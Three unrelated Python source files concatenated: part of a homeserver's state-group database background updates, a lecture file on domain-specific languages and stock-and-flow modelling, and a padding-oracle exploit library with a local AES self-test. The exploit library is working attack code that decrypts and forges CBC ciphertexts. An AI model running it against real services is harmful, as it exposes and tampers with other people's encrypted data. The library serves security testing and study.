and len(results[group]) == max_entries_returned
):
break
next_group = self.db_pool.simple_select_one_onecol_txn(
txn,
table="state_group_edges",
keyvalues={"state_group": next_group},
retcol="prev_state_group",
allow_none=True,
)
# The results shouldn't be considered mutable.
return results
class StateBackgroundUpdateStore(StateGroupBackgroundUpdateStore):
STATE_GROUP_DEDUPLICATION_UPDATE_NAME = "state_group_state_deduplication"
STATE_GROUP_INDEX_UPDATE_NAME = "state_group_state_type_index"
STATE_GROUPS_ROOM_INDEX_UPDATE_NAME = "state_groups_room_id_idx"
def __init__(
self,
database: DatabasePool,
db_conn: LoggingDatabaseConnection,
hs: "HomeServer",
):
super().__init__(database, db_conn, hs)
self.db_pool.updates.register_background_update_handler(
self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME,
self._background_deduplicate_state,
)
self.db_pool.updates.register_background_update_handler(
self.STATE_GROUP_INDEX_UPDATE_NAME, self._background_index_state
)
self.db_pool.updates.register_background_index_update(
self.STATE_GROUPS_ROOM_INDEX_UPDATE_NAME,
index_name="state_groups_room_id_idx",
table="state_groups",
columns=["room_id"],
)
async def _background_deduplicate_state(
self, progress: dict, batch_size: int
) -> int:
"""This background update will slowly deduplicate state by reencoding
them as deltas.
"""
last_state_group = progress.get("last_state_group", 0)
rows_inserted = progress.get("rows_inserted", 0)
max_group = progress.get("max_group", None)
BATCH_SIZE_SCALE_FACTOR = 100
batch_size = max(1, int(batch_size / BATCH_SIZE_SCALE_FACTOR))
if max_group is None:
rows = await self.db_pool.execute(
"_background_deduplicate_state",
None,
"SELECT coalesce(max(id), 0) FROM state_groups",
)
max_group = rows[0][0]
def reindex_txn(txn: LoggingTransaction) -> Tuple[bool, int]:
new_last_state_group = last_state_group
for count in range(batch_size):
txn.execute(
"SELECT id, room_id FROM state_groups"
" WHERE ? < id AND id <= ?"
" ORDER BY id ASC"
" LIMIT 1",
(new_last_state_group, max_group),
)
row = txn.fetchone()
if row:
state_group, room_id = row
if not row or not state_group:
return True, count
txn.execute(
"SELECT state_group FROM state_group_edges"
" WHERE state_group = ?",
(state_group,),
)
# If we reach a point where we've already started inserting
# edges we should stop.
if txn.fetchall():
return True, count
txn.execute(
"SELECT coalesce(max(id), 0) FROM state_groups"
" WHERE id < ? AND room_id = ?",
(state_group, room_id),
)
# There will be a result due to the coalesce.
(prev_group,) = txn.fetchone() # type: ignore
new_last_state_group = state_group
if prev_group:
potential_hops = self._count_state_group_hops_txn(txn, prev_group)
if potential_hops >= MAX_STATE_DELTA_HOPS:
                        # We want to ensure chains are at most this long,
                        # otherwise read performance degrades.
continue
prev_state_by_group = self._get_state_groups_from_groups_txn(
txn, [prev_group]
)
prev_state = prev_state_by_group[prev_group]
curr_state_by_group = self._get_state_groups_from_groups_txn(
txn, [state_group]
)
curr_state = curr_state_by_group[state_group]
if not set(prev_state.keys()) - set(curr_state.keys()):
# We can only do a delta if the current has a strict super set
# of keys
delta_state = {
key: value
for key, value in curr_state.items()
if prev_state.get(key, None) != value
}
self.db_pool.simple_delete_txn(
txn,
table="state_group_edges",
keyvalues={"state_group": state_group},
)
self.db_pool.simple_insert_txn(
txn,
table="state_group_edges",
values={
"state_group": state_group,
"prev_state_group": prev_group,
},
)
self.db_pool.simple_delete_txn(
txn,
table="state_groups_state",
keyvalues={"state_group": state_group},
)
self.db_pool.simple_insert_many_txn(
txn,
table="state_groups_state",
keys=(
"state_group",
"room_id",
"type",
"state_key",
"event_id",
),
values=[
(state_group, room_id, key[0], key[1], state_id)
for key, state_id in delta_state.items()
],
)
progress = {
"last_state_group": state_group,
"rows_inserted": rows_inserted + batch_size,
"max_group": max_group,
}
self.db_pool.updates._background_update_progress_txn(
txn, self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME, progress
)
return False, batch_size
finished, result = await self.db_pool.runInteraction(
self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME, reindex_txn
)
if finished:
await self.db_pool.updates._end_background_update(
self.STATE_GROUP_DEDUPLICATION_UPDATE_NAME
)
return result * BATCH_SIZE_SCALE_FACTOR
async def _background_index_state(self, progress: dict, batch_size: int) -> int:
def reindex_txn(conn: LoggingDatabaseConnection) -> None:
conn.rollback()
if isinstance(self.database_engine, PostgresEngine):
# postgres insists on autocommit for the index
conn.set_session(autocommit=True)
try:
txn = conn.cursor()
txn.execute(
"CREATE INDEX CONCURRENTLY state_groups_state_type_idx"
" ON state_groups_state(state_group, type, state_key)"
)
txn.execute("DROP INDEX IF EXISTS state_groups_state_id")
finally:
conn.set_session(autocommit=False)
else:
txn = conn.cursor()
txn.execute(
"CREATE INDEX state_groups_state_type_idx"
" ON state_groups_state(state_group, type, state_key)"
)
txn.execute("DROP INDEX IF EXISTS state_groups_state_id")
await self.db_pool.runWithConnection(reindex_txn)
await self.db_pool.updates._end_background_update(
self.STATE_GROUP_INDEX_UPDATE_NAME
)
return 1
|
|
from __future__ import print_function, division
import sys
sys.dont_write_bytecode = True
from ok import *
"""
<em>(I keep being asked... where to get models? where to get models? After this lecture, you will have
access to hundreds of models as well as methods for interviewing humans to learn their models.)</em>
# Domain-Specific Languages 101 (in Python)
This file shows an example of a small object-based DSL (domain-specific language) in Python.
In the language, all the tedious stuff is implemented in superclasses, letting
users express their knowledge in simple succinct subclasses.
The example here will be compartmental modeling and is
adapted from some excellent code from
[Abraham Flaxman](https://gist.github.com/aflaxman/4121076#file-sdm_diaper_delivery-ipynb).
Note that students of CSx91 have ready access to many
[compartmental models about software systems](http://unbox.org/doc/optimalML/madachyBook.pdf) ranging from

to the very complex.

## Theory
<img align=right width=300 src="http://www.quickmeme.com/img/23/23d727872d13ac2b652ea175ac6b63a1792688690e9eb6f7d7d0a82bc1ed94c5.jpg">
Does your language pass the _elbow test_? Do your business users elbow you out of the way
in their haste to fix what is obviously wrong with your code?
No? Then:
+ You are not speaking their language.
+ You've lost an
entire community that might have been able to audit,
verify, and evolve your code.
Enter domain-specific languages (DSLs). DSLs have also been called:
+ [little languages](http://staff.um.edu.mt/afra1/seminar/little-languages.pdf);
+ micro-languages;
+ application languages;
+ very high-level languages.
Example DSLs:
+ SQL
+ AWK (unix text reporting language)
+ Regular expressions
<img align=right width=400 src="http://api.ning.com/files/tcX1134PNX2h4QP7dIMahJNNnQqsDMD0tM6jzv6Da8-r1vv1wLntg3SRQsn0r6kCmIXa2Bp4VSaSFgRLkQjfdkleLqeuMgdJ/aliensymbols1.bmp">
DSLs are useful since
different representations of the same concepts can make certain inferences easier. Here's Douglas
Hofstadter from his book _Gödel, Escher, Bach_:
+ When you confront a (system) that you know nothing of,... your problem is how to assign interpretations to its symbols in a meaningful way...:
+ You may make several tentative stabs in the dark before finding a good set of words to associate with the symbols.
+ It is very similar to attempts to crack a code, or to decipher inscriptions in an unknown language...
+ When you hit a right choice... all of a sudden things just feel right, and work speeds up enormously.
+ Pretty soon everything falls into place.
Here's James Martin from his book _Design of Real-time Computer Systems_:
+ We must develop languages that the scientist, the architect, the teacher, and the layman can use without being computer experts.
+ The language for each user must be as natural as possible to him.
+ The statistician must talk to his terminal in the language of statistics.
+ The civil engineer must use the language of civil engineering.
+ When a man (sic) learns his profession he must learn the problem-oriented languages to go with that profession.
<img align=right width=400 src="http://image.slidesharecdn.com/letmakeuserhappy-130613095746-phpapp01/95/let-make-user-happy-1-638.jpg?cb=1371117649">
A DSL is a very high-level language that a user can learn and use in less than a day. Such productivity can only be achieved by tailoring the language to the special needs and skills of a particular class of users in a particular domain.
So one way to find a DSL is to listen to experts in some field commenting on their own processing. Often that processing
has repeated domain-specific idioms:
+ Idioms = methods imposed by programmers to handle common forms and procedures.
+ E.g. Ensure data is saved before the window is closed.
+ E.g. Before conducting expensive tests, perform cheap tests that can rule out need for expensive tests.
In a DSL-based software development process, the analyst:
+ Identifies the users and their tasks;
+ Identifies the common idioms used by those users;
+ Invents a little language to handle those idioms;
+ Generates sample sentences in that language;
+ Shows those sentences to the user and trains them how to write their own.
That is, instead of the analyst writing the application, the analyst writes tools that let a user community write and maintain their own knowledge.
The benefits of a DSL (productivity, explanatory power, ownership by the users) can be outweighed by the cost of building the DSL.
Two ways to build a DSL:
+ External DSL: code is a string which is read, parsed, and executed by (say) Python.
+ E.g. see [PyParsing](http://www.slideshare.net/Siddhi/creating-domain-specific-languages-in-python)
+ Internal DSL: use features of the host language to let people write code that resembles domain syntax.
+ See decorators, context managers
+ Code the idioms in general superclasses;
+ Leave the domain-specific stuff for subclasses
## Writing your own DSL in Python
### Decorators
A test engine, as a Python decorator
```python
def ok(*lst):
  print("### ", lst[0].__name__)
  for one in lst: unittest(one)
  return one

class unittest:
  tries = fails = 0  # tracks the record so far
  @staticmethod
  def score():
    t = unittest.tries
    f = unittest.fails
    return "# TRIES= %s FAIL= %s %%PASS = %s%%" % (
      t, f, int(round(t * 100 / (t + f + 0.001))))
  def __init__(i, test):
    unittest.tries += 1
    try:
      test()
    except Exception:
      unittest.fails += 1
      i.report(test)
  def report(i, test):
    import traceback
    print(traceback.format_exc())
    print(unittest.score(), ':', test.__name__)
```
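Usage is then just decoration: write a function whose body is a pile of asserts and
decorate it with `@ok`. A minimal sketch (the test name and asserts here are made up;
the real demos appear near the bottom of this file):
```python
@ok
def _sanity():
  # two asserts; if either throws, 'unittest' records a fail and prints a traceback
  assert 2 + 2 == 4
  assert "dsl".upper() == "DSL"
```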
### Context Managers
Here's an idiom for writing HTML:
```python
from contextlib import contextmanager

@contextmanager
def tag(name):
  print("<%s>" % name)
  yield
  print("</%s>" % name)

>>> with tag("h1"):
...   print("foo")
...
<h1>
foo
</h1>
```
Another example (print runtime of things):
```python
import time
from contextlib import contextmanager

@contextmanager
def duration():
  t1 = time.time()
  yield
  t2 = time.time()
  print("\n" + "-" * 72)
  print("# Runtime: %.3f secs" % (t2 - t1))

def _durationDemo():
  with duration():
    sum(x * x for x in range(10 ** 6))  # "do something"
```
Yet another example (always close things):
```python
from contextlib import contextmanager
import urllib

@contextmanager
def closing(thing):
  try:
    yield thing
  finally:
    thing.close()

with closing(urllib.urlopen('http://www.python.org')) as page:
  for line in page:
    print(line)
```
## Other Techniques
Use the sub-classing trick (this works in Python, or any other OO language).
+ Place the generic processing in superclasses.
+ Users write the particulars of their domain in subclasses.
+ Example, see below.
See also [Implementing Domain Specific Languages In Python](http://www.pyvideo.org/video/251/pycon-2010--implementing-domain-specific-language) (very long!).
## SAF: Stock and Flow (Compartmental Modeling in Python)
From Wikipedia:
+ Economics, business, accounting, and related
fields often distinguish between quantities that are
_stocks_ and those that are _flows_. These differ in
their units of measurement.
+ A stock variable is
measured at one specific time, and represents a
quantity existing at that point in time (say,
December 31, 2004), which may have accumulated in
the past.
+ A flow variable is measured over an
interval of time. Therefore a flow would be measured
per unit of time (say a year). Flow is roughly
analogous to rate or speed in this sense.
+ Examples:
+ A person or country might have stocks of money, financial assets, liabilities, wealth, real means of production, capital, inventories, and human capital (or labor power).
+ Flow magnitudes include income, spending, saving, debt repayment, fixed investment, inventory investment, and labor utilization. These differ in their units of measurement.
+ Formally:
+ A stock (or "level variable") in this broader sense is some entity that is accumulated over time by inflows and/or depleted by outflows. Stocks can only be changed via flows. Mathematically a stock can be seen as an accumulation or integration of flows over time - with outflows subtracting from the stock. Stocks typically have a certain value at each moment of time - e.g. the number of population at a certain moment.
+ flow (or "rate") changes a stock over time.
Usually we can clearly distinguish inflows (adding to the stock)
and outflows (subtracting from the stock). Flows typically
are measured over a certain interval of time - e.g., the number
of births over a day or month.
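To make the "accumulation or integration of flows" idea concrete, here is a minimal
sketch (plain Python with illustrative names; it is not part of the SAF code below)
of a single stock updated by Euler integration:
```python
def integrate(stock=100, inflow=0, outflow=8, dt=1, ticks=5):
  "stock(t+dt) = stock(t) + dt*(inflow - outflow), applied 'ticks' times."
  history = [stock]
  for _ in range(ticks):
    stock += dt * (inflow - outflow)  # inflows add, outflows subtract
    history.append(stock)
  return history

# integrate() == [100, 92, 84, 76, 68, 60]
```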
For practical purposes, it may be necessary to add _auxiliary variables_ to handle some intermediaries (so, in the following,
we can see _nominal productivity_).

Note the `sources` and `sinks` in the above diagram: these are infinite stocks that can generate or receive infinite
volumes.
So, in the following code, look for
```python
S,A,F = Stock, Aux, Flow
```
## Example: Diapers
```
q +-----+ r +-----+
---->| C |---->| D |--> s
^ +-----+ +-+---+
| |
+-----------------+
C = stock of clean diapers
D = stock of dirty diapers
q = inflow of clean diapers
r = flow of clean diapers to dirty diapers
s = out-flow of dirty diapers
```
This is modeled as a `have` method that initializes:
+ `C,D` as `Stock`s with initial levels 100,0;
+ `q,r,s` as `Flow`s with initial rates of 0,8,0;
and a `step` method that takes state `u`
and computes a new state `v` at
time `t+dt`.
```python
class Diapers(Model):
def have(i):
return o(C = S(100), D = S(0),
q = F(0), r = F(8), s = F(0))
def step(i,dt,t,u,v):
def saturday(x): return int(x) % 7 == 6
v.C += dt*(u.q - u.r)
v.D += dt*(u.r - u.s)
v.q = 70 if saturday(t) else 0
v.s = u.D if saturday(t) else 0
if t == 27: # special case (the day i forget)
v.s = 0
```
Note that the model is just some Python code so we can
introduce any shortcut function (e.g. `saturday`). To write the Python:
+ sum the in and outflows around each stock;
+ multiply that by the time tick `dt`
+ and add the result back to the stock
+ e.g. `v.C += dt*(u.q - u.r)`
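For example, with `dt=1`, `u.q=0` and `u.r=8`, the first tick takes `C` from 100 to
`100 + 1*(0 - 8) = 92`, which matches the second data row (the `. | 92 | 8 | ...` line)
of the `printm` output shown below.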
## Implementation
### Some set up code
"""
import random
r = random.random
isa = isinstance
class o:
"""Emulate Javascript's uber simple objects.
Note my convention: I use "`i`" not "`this`."""
def has(i) : return i.__dict__
def keys(i) : return i.has().keys()
def items(i) : return i.has().items()
def __init__(i,**d) : i.has().update(d)
def __setitem__(i,k,v) : i.has()[k] = v
def __getitem__(i,k) : return i.has()[k]
def __repr__(i) : return 'o'+str(i.has())
def copy(i):
j = o()
for k in i.has(): j[k] = i[k]
return j
def asList(i,keys=[]):
keys = keys or i.keys()
return [i[k] for k in keys]
"""
### Stocks, Flows, Aux are Subclasses of `Has`
`Has` is a named thing that knows the `lo` and `hi` values
(and
if values fall outside that range, this class can `restrain` them back in).
"""
class Has:
def __init__(i,init,lo=0,hi=100):
i.init,i.lo,i.hi = init,lo,hi
def restrain(i,x):
return max(i.lo,
min(i.hi, x))
def rank(i):
"Trick to sort together columns of the same type."
return 0
def __repr__(i):
return str(dict(what=i.__class__.__name__,
name= i.name,init= i.init,
lo = i.lo, hi = i.hi))
class Flow(Has) :
def rank(i): return 3
class Stock(Has):
def rank(i): return 1
class Aux(Has) :
def rank(i): return 2
"""
As promised:
"""
S,A,F = Stock,Aux,Flow
"""
### `Model`s contain `Stock`s, `Flow`s and `Aux`
When we `run` a model:
1. We keep the state vectors over all times in the `keep` list;
2. In that list, we store the values of the `Stock`s, `Flow`s, and `Aux` values;
3. At each time tick, all values are kept in the same order
+ Determined by the `keys` variable.
4. Between each time tick, we `restrain` any values that have drifted
outside their legal `lo..hi` range.
"""
class Model:
def state(i):
"""To create a state vector, we create
one slot for each name in 'have'."""
tmp=i.have()
for k,v in tmp.has().items():
v.name = k
return tmp
def run(i,dt=1,tmax=30):
"""For time up to 'tmax', increment 't'
by 'dt' and 'step' the model."""
t,b4 = 0, o()
keep = [] ## 1
state = i.state()
for k,a in state.items():
b4[k] = a.init
keys = sorted(state.keys(), ## 3
key=lambda z: state[z].rank())
keep = [["t"] + keys,
[0] + b4.asList(keys)]
while t < tmax:
now = b4.copy()
i.step(dt,t,b4,now)
for k in state.keys():
now[k] = state[k].restrain(now[k]) ## 4
keep += [[t] + now.asList(keys)] ## 2
t += dt
b4 = now
return keep
"""
### Support Utilities
Here's a cool trick for printing lists of lists... but
only showing new values if they are different from the row above.
For example, with `printm`, our model outputs:
```
### _diapers1
t | C | D | q | r | s
0 | 100 | 0 | 0 | 8 | 0
. | 92 | 8 | . | . | .
1 | 84 | 16 | . | . | .
2 | 76 | 24 | . | . | .
3 | 68 | 32 | . | . | .
4 | 60 | 40 | . | . | .
5 | 52 | 48 | . | . | .
6 | 44 | 56 | 70 | . | 48
7 | 100 | 16 | 0 | . | 0
8 | 92 | 24 | . | . | .
9 | 84 | 32 | . | . | .
10 | 76 | 40 | . | . | .
11 | 68 | 48 | . | . | .
12 | 60 | 56 | . | . | .
13 | 52 | 64 | 70 | . | 56
14 | 100 | 16 | 0 | . | 0
15 | 92 | 24 | . | . | .
16 | 84 | 32 | . | . | .
17 | 76 | 40 | . | . | .
18 | 68 | 48 | . | . | .
19 | 60 | 56 | . | . | .
20 | 52 | 64 | 70 | . | 56
21 | 100 | 16 | 0 | . | 0
22 | 92 | 24 | . | . | .
23 | 84 | 32 | . | . | .
24 | 76 | 40 | . | . | .
25 | 68 | 48 | . | . | .
26 | 60 | 56 | . | . | .
27 | 52 | 64 | 70 | . | .
28 | 100 | 72 | 0 | . | .
29 | 92 | 80 | . | . | .
```
Otherwise, the output is a little harder to read:
```
## _diapers1
t | C | D | q | r | s
0 | 100 | 0 | 0 | 8 | 0
0 | 92 | 8 | 0 | 8 | 0
1 | 84 | 16 | 0 | 8 | 0
2 | 76 | 24 | 0 | 8 | 0
3 | 68 | 32 | 0 | 8 | 0
4 | 60 | 40 | 0 | 8 | 0
5 | 52 | 48 | 0 | 8 | 0
6 | 44 | 56 | 70 | 8 | 48
7 | 100 | 16 | 0 | 8 | 0
8 | 92 | 24 | 0 | 8 | 0
9 | 84 | 32 | 0 | 8 | 0
10 | 76 | 40 | 0 | 8 | 0
11 | 68 | 48 | 0 | 8 | 0
12 | 60 | 56 | 0 | 8 | 0
13 | 52 | 64 | 70 | 8 | 56
14 | 100 | 16 | 0 | 8 | 0
15 | 92 | 24 | 0 | 8 | 0
16 | 84 | 32 | 0 | 8 | 0
17 | 76 | 40 | 0 | 8 | 0
18 | 68 | 48 | 0 | 8 | 0
19 | 60 | 56 | 0 | 8 | 0
20 | 52 | 64 | 70 | 8 | 56
21 | 100 | 16 | 0 | 8 | 0
22 | 92 | 24 | 0 | 8 | 0
23 | 84 | 32 | 0 | 8 | 0
24 | 76 | 40 | 0 | 8 | 0
25 | 68 | 48 | 0 | 8 | 0
26 | 60 | 56 | 0 | 8 | 0
27 | 52 | 64 | 70 | 8 | 0
28 | 100 | 72 | 0 | 8 | 0
29 | 92 | 80 | 0 | 8 | 0
```
"""
def printm(matrix,less=True):
"""Print a list of list, only showing changes
in each column (if less is True)."""
def ditto(m,mark="."):
def worker(lst):
out = []
for i,now in enumerate(lst):
before = old.get(i,None) # get old it if exists
out += [mark if before == now else now]
old[i] = now # next time, 'now' is the 'old' value
return out # the lst with ditto marks inserted
old = {}
return [worker(row) for row in m]
matrix = ditto(matrix) if less else matrix
s = [[str(e) for e in row] for row in matrix]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = ' | '.join('{{:{}}}'.format(x) for x in lens)
for row in [fmt.format(*row) for row in s]:
print(row)
"""
### Model
"""
class Diapers(Model):
def have(i):
return o(C = S(100), D = S(0),
q = F(0), r = F(8), s = F(0))
def step(i,dt,t,u,v):
def saturday(x): return int(x) % 7 == 6
v.C += dt*(u.q - u.r)
v.D += dt*(u.r - u.s)
v.q = 70 if saturday(t) else 0
v.s = u.D if saturday(t) else 0
if t == 27: # special case (the day i forget)
v.s = 0
"""
## Demo Code
"""
@ok
def _diapers1():
printm(Diapers().run())
"""## Appendix
### Appendix A.: Debugging Compartmental Models
Never underestimate the effort associated with commissioning a model.
+ The experience is rarely "Eureka!" but more like "huh, that's odd".
+ Repeat for several weeks.
So start small and get experience with the parts before trying to get lessons from the whole.
+ It is never too early to start your modeling.
FYI: you cannot debug complex emergent behavior directly.
+ Instead, debug the parts, then trust that the whole reflects the interactions of
the parts:
+ Write down ten micro-expectations of the simulation
+ Little effects, involving just a few variables
+ Check if these are happening (see the sketch after this list).
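For instance, one micro-expectation for the `Diapers` model above is that the stock of
clean diapers never goes negative (the default `lo=0` in `Has.restrain` should clip it).
A minimal sketch, written with the `@ok` test engine and a made-up test name:
```python
@ok
def _cleanNeverNegative():
  for row in Diapers().run()[1:]:    # skip the header row
    t, C = row[0], row[1]            # columns are t | C | D | q | r | s
    assert C >= 0, "negative clean stock at t=%s" % t
```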
### Appendix B.: Writing Compartmental Models
Hints and Tips
#### Method one: use linguistic clues.
Talk to the client. Record the session. Look for clues in that conversation, e.g.

For more on these linguistic clues, see
+ [Stock Flow Diagram Making with Incomplete Information
about Time Properties of Variables ](http://www.systemdynamics.org/conferences/2006/proceed/papers/TAKAH173.pdf)
+ [Translation from Natural Language to Stock Flow Diagrams ](http://www.systemdynamics.org/conferences/2005/proceed/papers/TAKAH137.pdf)
#### Method Two: Causal Model Refinement
As someone said, first we write down the intuition, then we write down the Xs and the Ys.
So here's a vague causal diagram:

Which, as you can sort of see, can be translated into:

Now imagine a bigger example:

For more on this approach, see:
+ [Introduction to System Dynamics](http://unbox.org/doc/optimalML/introSystemDynamics.pdf)
+ [DEVELOPING SYSTEM DYNAMICS MODELS FROM CAUSAL LOOP DIAGRAMS](http://webmail.inb.uni-luebeck.de/inb-publications/pdfs/BiVoBeHaSv04.pdf)
### Appendix C.: Compartmental Models Saving the Whole World
Reference: Geletko, D.; Menzies, T., "Model-based software testing via incremental treatment learning," in Software Engineering Workshop, 2003. Proceedings. 28th Annual NASA Goddard , vol., no., pp.82-90, 3-4 Dec. 2003
doi: 10.1109/SEW.2003.1270729
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=1270729&isnumber=28448
The infamous [Limits to Growth](http://www.donellameadows.org/wp-content/userfiles/Limits-to-Growth-digital-scan-version.pdf) study. 12 million copies were distributed in 37 languages.
In 1972, a team of system scientists and computer
modelers studied the effects of the world's
exponentially growing population and economy. A
model of the world was developed, and it predicted
_Doom!_ for the future: no matter what we do, overshoot and collapse by 2040:

+ Widely ridiculed.
+ [From Wikipedia](https://en.wikipedia.org/wiki/The_Limits_to_Growth#Reviews): After publication some economists, scientists and political figures criticized the Limits to Growth.
+ Critics attacked the methodology, the computer, the conclusions, the rhetoric, and the people behind the project.
+ Economists agreed that growth could not continue indefinitely, but that a natural end to growth was preferable to intervention.
+ Others argued that technology could solve all the problems the Meadows were concerned about, but only if growth continued apace. By stopping growth too soon, the world would be "consigning billions to permanent poverty".
+ My reply is that their model was written and read more than run.
+ Their reported limits are avoidable. See below.
Here is the compartmental model it was generated
from. It consists of the classes of world
population, nonrenewable resources, food,
industrial output, and persistent pollution index
from the year range 1900 to 2100. The model is
rather complex, consisting of hundreds of variables,
comprising the five main sectors of persistent
pollution, non-renewable resources, population,
agriculture (food production, land fertility, and
land development and loss), and economy (industrial
output, services output, and jobs).

Using the techniques of this class, Dustin Geletko and I
found mitigations that could save the world:

How did we do it? By capping family size and industrial output:
1. desired completed family size normal = [0..2]
2. Industrial Capital Output Ratio 1 = [3..5]
(Here, all values are discretized 0,1,2,3,4,5,6.)
So, study ASE to save the world.
"""
|
|
# -*- coding: utf-8 -*-
'''
Padding Oracle Exploit API
~~~~~~~~~~~~~~~~~~~~~~~~~~
'''
from itertools import izip, cycle
import logging
__all__ = [
'BadPaddingException',
'PaddingOracle',
]
class BadPaddingException(Exception):
'''
Raised when a blackbox decryptor reveals a padding oracle.
This Exception type should be raised in :meth:`.PaddingOracle.oracle`.
'''
class PaddingOracle(object):
'''
Implementations should subclass this object and implement
the :meth:`oracle` method.
:param int max_retries: Number of attempts per byte to reveal a
padding oracle, default is 3. If an oracle does not reveal
itself within `max_retries`, a :exc:`RuntimeError` is raised.
'''
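    # A minimal usage sketch (illustrative subclass and variable names; see the
    # test() function at the bottom of this module for a complete, runnable example):
    #
    #   class MyOracle(PaddingOracle):
    #       def oracle(self, data, **kwargs):
    #           # submit 'data' to the target; raise BadPaddingException if the
    #           # target reports a padding error, otherwise just return
    #           ...
    #
    #   plaintext = MyOracle().decrypt(ciphertext, block_size=16, iv=iv)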
def __init__(self, **kwargs):
self.log = logging.getLogger(self.__class__.__name__)
self.max_retries = int(kwargs.get('max_retries', 3))
self.attempts = 0
self.history = []
self._decrypted = None
self._encrypted = None
def oracle(self, data, **kwargs):
'''
Feeds *data* to a decryption function that reveals a Padding
Oracle. If a Padding Oracle was revealed, this method
should raise a :exc:`.BadPaddingException`, otherwise this
method should just return.
A history of all responses should be stored in :attr:`~.history`,
regardless of whether they revealed a Padding Oracle or not.
Responses from :attr:`~.history` are fed to :meth:`analyze` to
help identify padding oracles.
:param bytearray data: A bytearray of (fuzzed) encrypted bytes.
:raises: :class:`BadPaddingException` if decryption reveals an
oracle.
'''
raise NotImplementedError
def analyze(self, **kwargs):
'''
        This method analyzes the :meth:`oracle` return values stored in
:attr:`~.history` and returns the most likely
candidate(s) that reveals a padding oracle.
'''
raise NotImplementedError
def encrypt(self, plaintext, block_size=8, iv=None, **kwargs):
'''
Encrypts *plaintext* by exploiting a Padding Oracle.
:param plaintext: Plaintext data to encrypt.
:param int block_size: Cipher block size (in bytes).
:param iv: The initialization vector (iv), usually the first
*block_size* bytes from the ciphertext. If no iv is given
            or iv is None, the first *block_size* bytes will be null bytes.
:returns: Encrypted data.
'''
pad = block_size - (len(plaintext) % block_size)
plaintext = bytearray(plaintext + chr(pad) * pad)
self.log.debug('Attempting to encrypt %r bytes', str(plaintext))
if iv is not None:
iv = bytearray(iv)
else:
iv = bytearray(block_size)
self._encrypted = encrypted = iv
block = encrypted
n = len(plaintext + iv)
while n > 0:
intermediate_bytes = self.bust(block, block_size=block_size,
**kwargs)
block = xor(intermediate_bytes,
plaintext[n - block_size * 2:n + block_size])
encrypted = block + encrypted
n -= block_size
return encrypted
def decrypt(self, ciphertext, block_size=8, iv=None, **kwargs):
'''
Decrypts *ciphertext* by exploiting a Padding Oracle.
:param ciphertext: Encrypted data.
:param int block_size: Cipher block size (in bytes).
:param iv: The initialization vector (iv), usually the first
*block_size* bytes from the ciphertext. If no iv is given
or iv is None, the first *block_size* bytes will be used.
:returns: Decrypted data.
'''
ciphertext = bytearray(ciphertext)
self.log.debug('Attempting to decrypt %r bytes', str(ciphertext))
assert len(ciphertext) % block_size == 0, \
"Ciphertext not of block size %d" % (block_size, )
if iv is not None:
iv, ctext = bytearray(iv), ciphertext
else:
iv, ctext = ciphertext[:block_size], ciphertext[block_size:]
self._decrypted = decrypted = bytearray(len(ctext))
n = 0
while ctext:
block, ctext = ctext[:block_size], ctext[block_size:]
intermediate_bytes = self.bust(block, block_size=block_size,
**kwargs)
            # XOR the intermediate bytes with the previous block (iv)
# to get the plaintext
decrypted[n:n + block_size] = xor(intermediate_bytes, iv)
self.log.info('Decrypted block %d: %r',
n / block_size, str(decrypted[n:n + block_size]))
# Update the IV to that of the current block to be used in the
# next round
iv = block
n += block_size
return decrypted
def bust(self, block, block_size=8, **kwargs):
'''
A block buster. This method busts one ciphertext block at a time.
This method should not be called directly, instead use
:meth:`decrypt`.
:param block:
:param int block_size: Cipher block size (in bytes).
:returns: A bytearray containing the decrypted bytes
'''
intermediate_bytes = bytearray()
test_bytes = bytearray(block_size) # '\x00\x00\x00\x00...'
test_bytes.extend(block)
self.log.debug('Processing block %r', str(block))
# Work on one byte at a time, starting with the last byte
# and moving backwards
for byte_num in reversed(xrange(block_size)):
retries = 0
successful = False
# clear oracle history for each byte
self.history = []
# Break on first byte that returns an oracle, otherwise keep
# trying until we exceed the max retry attempts (default is 3)
while retries < self.max_retries and not successful:
for i in reversed(xrange(256)):
# Fuzz the test byte
test_bytes[byte_num] = i
# If a padding oracle could not be identified from the
# response, this indicates the padding bytes we sent
# were correct.
try:
self.attempts += 1
self.oracle(test_bytes[:], **kwargs)
except BadPaddingException:
# TODO
# if a padding oracle was seen in the response,
# do not go any further, try the next byte in the
# sequence. If we're in analysis mode, re-raise the
# BadPaddingException.
if self.analyze is True:
raise
else:
continue
except Exception:
self.log.exception('Caught unhandled exception!\n'
'Decrypted bytes so far: %r\n'
'Current variables: %r\n',
intermediate_bytes, self.__dict__)
raise
successful = True
current_pad_byte = block_size - byte_num
next_pad_byte = block_size - byte_num + 1
decrypted_byte = test_bytes[byte_num] ^ current_pad_byte
intermediate_bytes.insert(0, decrypted_byte)
for k in xrange(byte_num, block_size):
# XOR the current test byte with the padding value
# for this round to recover the decrypted byte
test_bytes[k] ^= current_pad_byte
# XOR it again with the padding byte for the
# next round
test_bytes[k] ^= next_pad_byte
break
if successful:
break
else:
retries += 1
else:
raise RuntimeError('Could not decrypt byte %d in %r within '
'maximum allotted retries (%d)' % (
byte_num, block, self.max_retries))
return intermediate_bytes
def xor(data, key):
'''
XOR two bytearray objects with each other.
'''
return bytearray([x ^ y for x, y in izip(data, cycle(key))])
def test():
import os
from Crypto.Cipher import AES
teststring = 'The quick brown fox jumped over the lazy dog'
def pkcs7_pad(data, blklen=16):
if blklen > 255:
raise ValueError('Illegal block size %d' % (blklen, ))
pad = (blklen - (len(data) % blklen))
return data + chr(pad) * pad
class PadBuster(PaddingOracle):
def oracle(self, data):
_cipher = AES.new(key, AES.MODE_CBC, str(iv))
ptext = _cipher.decrypt(str(data))
plen = ord(ptext[-1])
padding_is_good = (ptext[-plen:] == chr(plen) * plen)
if padding_is_good:
return
raise BadPaddingException
padbuster = PadBuster()
key = os.urandom(AES.block_size)
iv = bytearray(os.urandom(AES.block_size))
print "Testing padding oracle exploit in DECRYPT mode"
cipher = AES.new(key, AES.MODE_CBC, str(iv))
data = pkcs7_pad(teststring, blklen=AES.block_size)
ctext = cipher.encrypt(data)
decrypted = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv)
print "Key: %r" % (key, )
print "IV: %r" % (iv, )
print "Plaintext: %r" % (data, )
print "Ciphertext: %r" % (ctext, )
print "Decrypted: %r" % (str(decrypted), )
